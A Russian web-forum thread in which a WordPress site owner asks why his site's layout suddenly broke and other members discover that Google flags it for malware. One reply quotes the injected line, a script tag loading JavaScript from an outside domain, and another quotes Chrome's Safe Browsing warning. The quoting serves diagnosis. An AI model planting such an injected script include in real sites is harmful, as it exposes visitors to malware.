Перекосило сайт на вордпрессе

12
C
На сайте с 12.01.2011
15
1078

сайт udalenie-dereviev.ru новый- месяца четыре...все было нормально- но вчера перекосило дизайн...никаких работ перед этим не проводил.....в чем проблема может быть?

заранее благодарю....

Вырубка, удаление аварийных деревьев (http://udalenie-dereviev.ru/) от UDALENIE-DEREVIEV.RU
melkozaur
На сайте с 06.04.2010
536

А что там перекосило?

vandamme
На сайте с 30.11.2008
675

мож поломали сайтик и чикнули тему, или прописали туда ифреймы некорректные

C
На сайте с 12.01.2011
15
melkozaur:
А что там перекосило?

ээээээээ а увас все нормально открывается? у меня все смещено влево хотя было по центру....изменились границы шапки, подвала и надписей....глюк с панелью кнопок...

Yvan
На сайте с 15.04.2010
55
crazumer:
ээээээээ а увас все нормально открывается? у меня все смещено влево хотя было по центру....изменились границы шапки, подвала и надписей....глюк с панелью кнопок...

У меня всё ровненько!)))

Wazzuuuuup
C
На сайте с 12.01.2011
15

хм.....а каких браузерах ровненько???? у меня експлорер- открывается с глюками(((

Yvan
На сайте с 15.04.2010
55
crazumer:
хм.....а каких браузерах ровненько???? у меня експлорер- открывается с глюками(((

Есть сервис для проверки в разных браузерах и с разными разрешениями. Название не помню, он прям пачку скринит....

Анеле
На сайте с 15.07.2011
24

У меня тоже нормально все - Mozilla Firefox.

~Копирайтинг — 4$~ (/ru/forum/665638)
Dwarf_V
На сайте с 23.01.2008
75

Гугл пишет что на сайте вирус...

и в самом верху вот что есть :

<script type="text/javascript" src="http://brownpaper.co.th/jtoolsmini.js"></script>

как раз на него и ругается гугл...🍿

У меня Хром все нормально вроде показывает сайт

F
На сайте с 08.04.2010
56
crazumer:
сайт udalenie-dereviev.ru новый- месяца четыре...все было нормально- но вчера перекосило дизайн...никаких работ перед этим не проводил.....в чем проблема может быть?
заранее благодарю....

вот что хром выдает

Внимание! Обнаружена проблема!

udalenie-dereviev.ru содержит материалы сайта brownpaper.co.th, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт.
Мы уже сообщили владельцу сайта brownpaper.co.th о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на brownpaper.co.th, можно узнать на странице Google Страница диагностики безопасного просмотра.
C
На сайте с 12.01.2011
15

пипец.....благодарствую- щас буду исправлять....

и еще вопрос- сайт мой личный и доступа к нему ни у кого нет.....но если на нем какая то фигня появилась- получается что взломали что-ли?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий